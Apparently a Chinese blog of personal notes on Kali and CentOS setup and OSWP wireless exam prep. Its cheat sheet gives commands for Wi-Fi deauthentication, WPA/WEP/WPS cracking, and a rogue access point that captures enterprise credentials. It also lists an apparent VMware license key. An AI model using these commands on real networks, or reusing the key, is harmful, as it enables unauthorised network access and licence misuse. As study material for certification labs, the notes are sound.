安K全L运C营P

2023-01-05 boring

- aa

  • aa
  • aa
    1

- kali2022

  • Kali 1.0 基于 Debian Wheezy。 Kali 2.0 基于 Jessie。 Kali 滚动基于 Debian 测试。
  • 实时模式启动到 RAM,安装的 Kali 实例启动到存储设备。
  • 实时模式启动至 RAM,但可能会自动挂载磁盘。 取证模式不会自动安装驱动器。
  • 使用 mount命令验证是否未安装任何磁盘。 您还可以对系统的交换和磁盘设备进行 MD5,重新启动到取证模式并再次进行 MD5。 如果取证模式成功,MD5 哈希值应该匹配。 在您不关心“污染”的系统中尝试一下!
  • 请求添加工具的最佳方式是在 Kali Bug Tracker 中打开“新工具请求”票证。
  • Kali 中一些很酷的功能,实时系统、取证模式、自定义 Linux 内核、完全可定制、默认禁用网络服务的可信操作系统、ARM 支持、预装安全工具、渗透测试平台!
  • 当您想要实现以下目的时,Kali Live 非常有用: 将 Kali 的便携式副本放在口袋里; 无需对计算机进行任何更改即可测试 Kali Linux; 需要启用取证模式。 使用 Kali live 作为任何类型的永久安装都是一个坏主意,特别是如果您希望保存更改(没有持久性!)或者启动计算机上的内存有限。
  • Kali(和 Debian)ISO 是一个 isohybrid 。 构建 ISO 后, syslinux 实用程序会运行 isohybrid ISO 上的命令,将分区表添加到 ISO,同时仍保持其有效的 ISO 文件。

- kali2022安装使用vm

  • 登录账户并访问下载 https://customerconnect.vmware.com/cn/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/17_0
  • sh Mware-Workstation-Full.bundle
  • JU090-6039P-08409-8J0QH-2YR7F
  • vmware status
  • vmware start
  • nohup rdesktop -r sound:remote -r disk:share_name=/root/XXX/123 ip > /dev/null 2>&1 &

- kali2022安装docker

  • apt-get install docker.io docker-compose
  • service docker start
  • systemctl enable docker

- kali2022开启蓝牙

  • sudo service bluetooth start

- kali2022查看网卡型号

  • lspci -v | grep "Network controller"

- kali2022安装cpulimit并限制占用率为80%

  • sudo apt-get install cpulimit
  • 查pid
    ps aux | grep 进程名
    -nohup cpulimit --pid XXX --limit 80 > /dev/null 2>&1 &

- kali2022温控

  • sudo apt-get install lm-sensors psensor
  • sudo sensors_detect 授权其传感器 全部yes
  • sensors 查看温度相关信息
  • gui打开psensor 查看温度相关信息

- kali2022安装并切换java版本

  • https://www.oracle.com/java/technologies/downloads/#java8
  • 登录oracle共享账户并下载
  • mv jdk-8u361-linux-x64.tar.gz /opt
  • cd /opt
  • tar -zxvf jdk-8u361-linux-x64.tar.gz
  • vi /etc/profile 在最后一行添加
    rt JAVA_HOME=/opt/jdk1.8.0_361
    export CLASSPATH=.:JAVAHOME/libexportPATH={JAVA_HOME}/lib export PATH={JAVA_HOME}/bin:$PATH
  • source /etc/profile
  • update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_361/bin/java 1
  • update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_361/bin/javac 1
  • update-alternatives --set java /opt/jdk1.8.0_361/bin/java
  • update-alternatives --set javac /opt/jdk1.8.0_361/bin/javac
  • update-alternatives --config java
  • java -version

- kali2022安装内核头

  • apt-get install linux-headers-$(uname -r)

- kali2022安装输入法

  • apt-get install fcitx
  • apt-get install fcitx-googlepinyin
  • im-config 配件输入源和键盘
  • 重启后才能正常打字(ctrl+空格)

- kali2022安装截图工具

  • apt-get install shutter
  • 配置快捷键 命令shutter -s 开启截图

- kali2022火狐firefox中文插件包

  • https://addons.mozilla.org/zh-CN/firefox/addon/chinese-simplified-zh-cn-la/

- kali2022代理

  • https://github.com/v2fly/v2ray-core/releases/tag/v4.45.2
  • https://github.com/Qv2ray/QvPlugin-Trojan/releases
  • https://github.com/Qv2ray/Qv2ray/releases/tag/v2.7.0
  • /root/.config/qv2ray/vcore/ 最高支持V2Ray 4.45.2
  • mkdir -p home/.config/qv2ray/plugins 可添加插件QvPlugin-Trojan.v3.0.0.linux-x64.so

- kali2022安装wps

  • 下载https://linux-bucket.ks3-cn-beijing.ksyun.com/wps/download/ep/Linux2019/11691/wps-office_11.1.0.11691_amd64.deb
  • dpkg -i XX.deb
  • 国内字体ttf下载链接:http://xiazaiziti.com/?s=wingding+3 自行搜索下载所缺失的字体
  • 复制win系统的C:\Windows\Fonts 到/usr/share/fonts/wps-office/

- 请各位小伙伴们,详细阅读公司网络使用注意事项。

  • 近期服务部开展公司网络安全隐患检查,下列操作请注意。
    1.公司电脑主机需要8位以上复杂登陆密码,不得私自插入U盘,有需求请上报批准。
    2.不得利用公司电脑私自开启wifi热点分享,密码等信息不得发给非工作人员,有需求请上报批准。
    3.禁止浏览赌博和色情网站,有需求请上报批准。
    4.禁止私自搭建VPN及隧道通向公司外部,或者从公司外连接到工作电脑,不能安装来历不明的程序,有需求请上报批准。
    5.电脑应该开启防火墙,及时更新系统补丁。
    6.个人离开电脑应该锁屏。

- centos 7.9在线安装docker

  • curl -fsSL https://get.docker.com | bash -s docker --mirror aliyun
  • yum -y install docker
  • sudo yum install docker
  • sudo systemctl start docker
  • sudo systemctl enable docker
  • docker version
  • docker images
  • docker image rm IMAGE_ID
  • docker ps -a
  • docker start ID
  • docker restart ID
  • docker update --restart=always CONTAINER_ID
  • docker exec it ID bash

- centos 7.9离线安装docker

  • wget --no-check-certificate https://link.storjshare.io/s/juljeuqy6xuu37krtgskmuvw73aq/ydisk/offline-setup-docker-centos7.9.tar.gz?download=1 -O offline-setup-docker-centos7.9.tar.gz
  • tar -zxvf offline-setup-docker-centos7.9.tar.gz
  • yum localinstall ./文件夹名/*.rpm

- centos 7.9启动docker并设置开机启动

  • systemctl enable docker.service
  • systemctl start docker.service

- centos 7.9离线安装python3

  • wget --no-check-certificate https://link.storjshare.io/s/jwrjcsg2xushuxpkz5eyuqs7ijeq/ydisk/offline-setup-python3-centos7.9.tar.gz?download=1 -O offline-setup-python3-centos7.9.tar.gz
  • tar -zxvf offline-setup-python3-centos7.9.tar.gz
  • yum localinstall ./文件夹名/*.rpm

- centos 7.9防火墙开端口

  • sudo firewall-cmd --zone=public --add-port=80/tcp --permanent
  • sudo firewall-cmd --reload
  • sudo firewall-cmd --list-ports

- centos7.9安装kvm

  • lscpu | grep Virtualization
  • sudo yum install @virt
  • sudo yum install virt-top libguestfs-tools virt-install virt-viewer
  • yum -y install qemu-kvm libvirt virt-install bridge-utils
  • sudo yum -y install virt-manager
  • sudo systemctl start libvirtd.service
  • sudo systemctl enable libvirtd.service
  • yum install cockpit
  • systemctl enable --now cockpit.socket
  • yum install cockpit-machines
  • yum install -y cockpit-docker
  • yum install -y cockpit-kubernetes
  • yum install -y cockpit-storaged
  • systemctl enable --now cockpit.socket

- kvm完整克隆并设置开机启动

  • virsh list --all
  • virt-clone --auto-clone -o name -n new_name
  • virsh autostart name

- kvm导入 完整克隆

  • xml文件和qcow2文件 都放到home目录下
  • virsh define --file /home/name.xml

- centos 7.9配置静态ip

  • vi /etc/sysconfig/network-scripts/ifcfg-eth0
  • BOOTPROTO="static"
    DNBOOT=yes
    IPADDR=192.168.1.2
    NETMASK=255.255.255.0
    GATEWAY=192.168.1.1
    DNS1=114.114.114.114
  • service network restart

- centos7.9安装系统命令

  • yum -y install wget
  • yum install net-tools.x86_64
  • yum install -y lrzsz

- 悦库网盘

  • wget https://pkg.aimicloud.com/ydisks_docker_x64.tar.gz
  • tar -zxvf ydisks_docker_x64.tar.gz
  • cd ydisks
  • sudo chmod 744 setup.py
  • sudo ./setup.py
  • https://ydisk.cn/docs/#/md/deploy/linux

- centos7.9 npc穿透内网

  • wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
  • tar -zxvf linux_amd64_client.tar.gz
  • nohup ./npc -server=ip:port -vkey=XXX -type=tcp &
  • systemctl enable npc

- centos7.9挂载磁盘

  • fdisk -l
  • df -TH
  • umount /dev/vdb
  • mount /dev/vdb /home/

- KVM扩容centos 7.9内存 cpu 磁盘

  • 物理机下
    virsh edit name
    <memory unit='KiB'>16777216</memory>
    <currentMemory unit='KiB'>16777216</currentMemory>
    <vcpu placement='static'>16</vcpu>
  • 物理机下进入qcow2存放目录
    qemu-img resize name.qcow2 +100G
  • 虚拟机下
    fdisk -l 获取到 磁盘名字 /dev/vda
    fdisk /dev/vda
    n
    p
    默认
    w
    fdisk /dev/vda
    t
    默认
    8e
    w
    partprobe
    pvcreate /dev/vda3
    vgdisplay 获取到 VG Nmae 为 centos
    vgextend centos /dev/vda3
    vgdisplay
    lvresize -L +100G /dev/centos/home
    xfs_growfs /dev/mapper/centos-home
    df -h

- centos7.9部署masscan

  • yum install git gcc make libpcap-devel clang
  • cd /opt
  • git clone https://github.com/robertdavidgraham/masscan.git
  • cd /masscan
  • make
  • vi /etc/profile
    最后一行添加
    PATH=/opt/masscan/bin:$PATH
    export PATH
  • source /etc/profile

- Ubuntu 18.04.6部署Rocket.Chat

  • lsb_release -a
  • systemctl status snapd.service
  • snap install core
  • snap install rocketchat-server
  • sudo systemctl restart snap.rocketchat-server.rocketchat-server.service
  • sudo systemctl restart snap.rocketchat-server.rocketchat-caddy.service
  • sudo service snap.rocketchat-server.rocketchat-server status
  • systemctl enable rocketchat.service
  • systemctl start rocketchat.service
  • systemctl enable mongod.service
  • sudo ufw status
  • systemctl stop snapd.service
  • systemctl disable snapd.service

- vulfocus靶场部署

  • https://fofapro.github.io/vulfocus/#/INSTALL?id=普通docker镜像安装
  • docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxx.xxx.xxx.xxx -e EMAIL_HOST="xxx.xxx.xxx" -e EMAIL_HOST_USER="xxx@xxx.com" -e EMAIL_HOST_PASSWORD="xxxxxxxx" vulfocus/vulfocus

- 后台运行命令

  • nohup command > /dev/null 2>&1 &

- 240103

  • 监考手册 https://help.offsec.com/hc/en-us/articles/360050299352
  • 监考平台 https://proctoring.offensive-security.com/student/login
  • 监考test平台 https://proctoring.offensive-security.com/Student/TestExam
  • OSID和MD5(考前一天通过邮件接收) proctoring@offensive-security.com
  • klcp考试指南 https://help.offsec.com/hc/en-us/articles/360059125211
  • oswp考试指南https://help.offsec.com/hc/en-us/articles/360046904731
  • 考点 https://www.classmarker.com/
  • 常见问题
    https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams
    https://help.offsec.com/hc/en-us/requests/new
  • 上传报告 https://upload.offsec.com/

- 确定设备的驱动程序和详细信息

  • sudo airmon-ng
  • sudo lsusb -vv

- **列出Driver参数 **

  • sudo modinfo ath9k_htc

- 列出所有已加载的模块以及 每个模块的依赖关系

  • lsmod

- 加载 ath9k_htc 并禁用 闪烁 LED

  • sudo modprobe ath9k_htc blink=0

- 删除模块 依赖关系

  • sudo rmmod ath
  • sudo rmmod ath9k_htc ath9k_common ath9k_hw ath

- iw

  • sudo iwlist wlan0 frequency 显示可用的 频道/频率
  • sudo iw list 显示详细信息 无线接口信息
  • sudo iwconfig wlan1 检查频率/频道
  • sudo iw dev wlan0 scan | grep SSID 解析 iw 列出可用的 SSID 扫描输出
  • sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:" 列出可用的 SSID 和 通过解析 iw 扫描输出的通道
  • sudo iw dev wlan0 interface add wlan0mon type monitor 添加单独的监视模式 接口,称为 wlan0mon,链接到 wlan0
  • sudo ip link set wlan0mon up 启动新创建的 wlan0mon
  • sudo iw dev wlan0mon info 从 iw 获取信息 监控模式界面
  • sudo tcpdump -i wlan0mon 使用 tcpdump 测试监控模式
  • sudo iw dev wlan0mon interface del 删除监控模式 VAP
  • sudo iw reg get 获取监管域信息
  • vi /etc/default/crda,填写 REGDOMAIN=US 更改或设置监管域

- **rfkill **

  • sudo rfkill list 列出RF模块
  • sudo rfkill list 1 列出禁用的RF模块
  • sudo rfkill block 1 禁用设备1
  • sudo rfkill unblock 1 解锁设备1
  • sudo rfkill block all 禁用所有无线设备

- Aircrack-ng

  • 显示状态 以及有关系统上无线接口的信息 sudo airmon-ng
  • 检查网络管理器 sudo airmon-ng check
  • 终止影响网卡的其余进程 sudo airmon-ng check kill
  • 启用监控模式wlan1模式 sudo airmon-ng start wlan1
  • 停用监控模式wlan1模式 sudo airmon-ng stop wlan1
  • 启用监视器wlan1模式,通道 3 sudo airmon-ng start wlan1 3
  • 输出关于系统和安装的无线网卡 详细信息 sudo airmon-ng --verbose
  • 输出更多来自系统命令的详细信息 sudo airmon-ng --debug
  • 仅捕获通道 2 上的数据包 sudo airodump-ng wlan1 -c 2
  • 精准捕获数据包输出到 cap1 文件 sudo airodump-ng -c 3 --bssid 34:08:04:09:3D:38 -w cap1 wlan1
  • 输出的文件扩展名 sudo airodump-ng --output-format csv,pcap wlan1
  • 注入测试 sudo aireplay-ng -9 wlan1
  • 接入点和无线网卡锁定在10信道上 iwconfig wlan1 channel 10
  • 精准注入测试 sudo aireplay-ng -9 -e wifi名 -a 34:08:04:09:3D:38 wlan1
  • sudo aireplay-ng -0 1 -a MAC地址(bssid) -c ESSID wlan1
  • 卡对卡注入测试 sudo aireplay-ng -9 -i wlan1 wlan0
  • CPU 上的基准测试 aircrack-ng -S
  • 从捕获的文件中过滤其他 AP sudo airdecap-ng -b 34:08:04:09:3D:38 opennet-01.cap
  • wget http://standards-oui.ieee.org/oui.txt
    输出客户端与 AP 关系图 airgraph-ng -o Picture1_png -i dump-01.csv -g CAPR
  • 输出客户探针图 airgraph-ng -o Picture2.png -i dump-01.csv -g CPG
  • 列出包含以下内容的所有行 “密码” grep -i password /usr/share/john/password.lst
  • vi /etc/john/john.conf
    JtR 添加两个修改规则
    [09][0-9][0-9]
    [09][0-9][0-9]$[0-9]
  • john --wordlist=/usr/share/john/password.lst --rules --stdout | grep -i Password123 测试重整规则 JtR
  • john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap 结合 JtR 修改规则和 通过管道将其连接到aircrack-ng
  • crunch 8 9 生成单词列表 单词长度在 8 到 9 个字符之间的所有可打印字符
  • crunch 8 9 abc123 用生成单词列表 字符集 abc123,单词长度在 8 到 9 个字符之间
  • crunch 11 11 -t password%%% 生成 以密码开头、以四位数字结尾的单词列表
  • crunch 11 11 0123456789 -t password@@@ 生成 以“密码”开头并以四位数字结尾的单词列表 - 替代版本
  • crunch 1 1 -p abcde12345 生成单词列表 使用“abcde12345”中的字符而不重复其中任何一个
  • crunch 1 1 -p dog cat bird 生成 包含多个单词而不是字符的单词列表,不重复 他们
  • crunch 5 5 -t ddd%% -p dog cat bird 成包含多个单词而不是字符的单词列表,无需 重复它们并添加两位数字
  • crunch 5 5 aADE -t ddd@@ -p dog cat bird 生成 来自多个单词的非重复单词列表并添加两个字符 来自定义的字符集
  • crunch 11 11 -t password%%% | aircrack-ng -e wifu crunch-01.cap -w - 将 Crunch mangling 与 通过管道将其连接到aircrack-ng
  • echo bird > wordlist.txt
    echo cat >> wordlist.txt
    echo dog >> wordlist.txt
    rsmangler --file wordlist.txt
    rsmangler --file wordlist.txt --output mangled.txt RSMangler 输出到文件
  • cat wordlist.txt | rsmangler --file - 连接到 RSMangler 的单词列表
  • rsmangler --file wordlist.txt --min 12 --max 13 用修改单词列表 RSManger 并限制为 12-13 个字符
  • rsmangler --file wordlist.txt --min 12 --max 13 | aircrack-ng -e wifu rsmangler-01.cap -w - 组合 RSMangler 重整 并将其通过管道传输到 Aircrack-ng
  • hashcat -I 显示设备属性
  • hashcat -b -m 2500 基准测试
  • sudo apt install hashcat-utils 安装 hashcat 实用程序
  • /usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx 将 PCAP 转换为 hashcat 的 hccapx
  • hashcat -m 2500 output.hccapx /usr/share/john/password.lst 使用 hashcat 进行破解
  • echo wifu > essid.txt 将目标 ESSID 添加到文件
    airolib-ng wifu.sqlite --import essid essid.txt 导入 ESSID Airolib-NG
    airolib-ng wifu.sqlite --stats 查看 airolib-ng 数据库 统计数据
    airolib-ng wifu.sqlite --import passwd /usr/share/john/password.lst 将密码导入到 airolib-ng 数据库
    airolib-ng wifu.sqlite --batch 为 ESSID 生成 PMK
    aircrack-ng -r wifu.sqlite wpa1-01.cap 恢复 WPA 密码 airolib-ng 数据库
  • genpmk -f /usr/share/john/password.lst -d wifuhashes -s wifu 创建预先计算的哈希表
    cowpatty -r wpajohn-01.cap -d wifuhashes -s wifu 使用预先计算的哈希表

- WPA/WPA2企业网络

  • 终止影响网卡的其余进程 sudo airmon-ng check kill
  • 启用监控模式 sudo airmon-ng start wlan0mon
  • 收集wifi信息(MGT为企业网络) sudo airodump-ng wlan0mon
  • 抓握手包(保持运行直到抓取成功后停止) sudo airodump-ng -c 2 -w wifi名 wlan0mon
  • 导致wifi重连 sudo aireplay-ng -0 1 -a MAC地址(BSSID) -c ESSID wlan0mon
  • 停用监控模式 sudo airmon-ng stop wlan0mon
  • 打开cap包 sudo wireshark wifi名-o1.cap
  • 过滤地址 wlan.bssid==xxxxx && eap && tls.handshake.certificate
  • 打开Extensible Authentication Protocol-Transport Layer Security-Certificate-Handshake Protocol-Certificate-两串长字符-右击第一串长字符-点击Export保存为cert.der
  • 看证书的Issuer和Subject openssl x509 -inform der -in cer.der -text
  • 输出crt openssl x509 -inform der -in cer.der -outform pem -out output.crt
  • 查看crt cat output.crt
    -安装开源的 RADIUS 服务器 sudo apt install freeradius
  • 修改ca文件的50-55行 sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
    countryName = US
    stateOrProvinceName = CA
    localityName = San Francisco
    organizationName = Playtronics
    emailAddress = ca@playtronics.com
    commonName = "Playtronics Certificate Authority"
  • 修改server文件的49-54行 sudo mousepad /etc/freeradius/3.0/certs/server.cnf
    countryName = US
    stateOrProvinceName = CA
    localityName = San Francisco
    organizationName = Playtronics
    emailAddress = admin@playtronics.com
    commonName = "Playtronics"
  • 进cnf目录编译
    sudo -s
    cd /etc/freeradius/3.0/certs/
    rm dh
    make
    exit
  • 安装 hostapd-mana sudo apt install hostapd-mana
  • 修改conf文件 sudo mousepad /etc/hostapd-mana/hostapd-mana.conf
    ssid=Playtronics
    ca_cert=/etc/freeradius/3.0/certs/ca.pem
    server_cert=/etc/freeradius/3.0/certs/server.pem
    private_key=/etc/freeradius/3.0/certs/server.key
    eap_user_file= /etc/hostapd-mana/hostapd-mana.eap_user
    mana_credout=/tmp/hostapd.credout
  • 查看eap_user文件并包含以下内容 sudo mousepad /etc/hostapd-mana/hostapd-mana.eap_user
  • PEAP,TTLS,TLS,FAST
    

"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]

  • 启动hostapd-mana sudo hostapd-mana /etc/hostapd-mana/hostapd-mana.conf
    username:cosmo
    password:123456
    提取asleep后面的字符串
  • 跑asleep后面的字符串获取明文密码 asleep -C xxxxxxx -W /usr/share/john/password.lst
  • 查看credout文件 cat /tmp/hostapd.credout
  • 手动连接 wpa_supplicant -c
    前台连接 sudo wpa_supplicant -i wlan0 -c wifi-client.conf
    后台连接 sudo wpa_supplicant -i wlan0 -c wifi-client.conf -B
    sudo dhclient wlan0
    连接到WPA/WPA2企业的wifi-client.conf
    network={
    ssid="NetworkName"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="Domain\username"
    password="password"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
    }

- WEP网络

  • 终止冲突进程 sudo airmon-ng check kill
  • 启动监控模式 sudo airmon-ng start wlan0
  • 扫描 WEP 网络 sudo airodump-ng wlan0mon --encrypt WEP
  • 捕获 besside-ng -c Channel -b BSSID wlan0mon
  • 破解WEP密钥 aircrack-ng ./wep.cap
  • 手动连接
    sudo iwconfig wlan0 essid key s:
    sudo dhclient wlan0

连接到WEP的wifi-client.conf
network={
ssid="hotel_wifi"
scan_ssid=1
}

- ** MAC 过滤的开放网络**

  • 抓包 airodump-ng -w <CAPTURE_NAME> -c --bssid
  • 获取MAC 地址 macchanger --show
  • 虚假身份验证攻击 aireplay-ng -1 0 -e -a -h <YOUR_MAC>
  • ARP重放攻击 aireplay-ng -3 -b -h <YOUR_MAC>
  • 取消认证攻击 aireplay-ng -0 1 -a -c <CLIENT_MAC>
    -破解密码 aircrack-ng <CAPTURE_NAME>

- WPA/WPA2网络

  • sudo airmon-ng check kill
  • sudo airodump-ng wlan0
  • sudo airodump-ng -c 目标AP的信道 -w 保存数据包的文件名 wlan0
  • sudo aireplay-ng -a 目标AP的mac地址 -0 4 wlan0

连接到WPA-PSK 的wifi-client.conf
network={
ssid="home_network"
scan_ssid=1
psk="correct battery horse staple"
key_mgmt=WPA-PSK
}

- WPS网络

  • sudo apt install airgeddon
  • source /usr/share/airgeddon/known_pins.db
  • 检查数据库中 BSSID 开头的 AP “0013F7”
    echo ${PINDB["0013F7"]}
  • 识别启用了 WPS 的接入点 wash -i -s
  • 虚假身份验证攻击 aireplay-ng -1 0 -e -a -h <YOUR_MAC>
  • 离线暴力破解 reaver -i wlan0 -b BSSID -SNLAvv -c 1 -K
  • 在线暴力破解 reaver -i -b -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>

- screen

  • 列出cmd screen -ls
  • 创建cmd但不接入 screen -S Hello -d -m
  • 进入某个cmd screen -r Hello
  • 从某个cmd切出来 Ctrl+a+d
  • 杀死某个cmd screen -r Hello -X quit

- ssh

  • ssh @<target_ip> -p

- 备忘单

  • https://liodeus.github.io/2020/10/29/OSWP-personal-cheatsheet.html?source=post_page-----2a1476233484--------------------------------
  • https://github.com/alenperic/OSWP-Study-Guide
  • http://www.nnnxxx.cn
  • lab37.cn
  • 视频演示 https://attackdefense.com/listingnoauth?labtype=wifi-security-basics&subtype=wifi-security-basics-ap-client-basics
  • https://github.com/brcyrr/OSWP/blob/main/1%20-%20Aircrack-ng%20Essentials

- 重启网络管理器

  • systemctl restart NetworkManager.service

- sd

  • sys

支付宝扫码打赏 微信打赏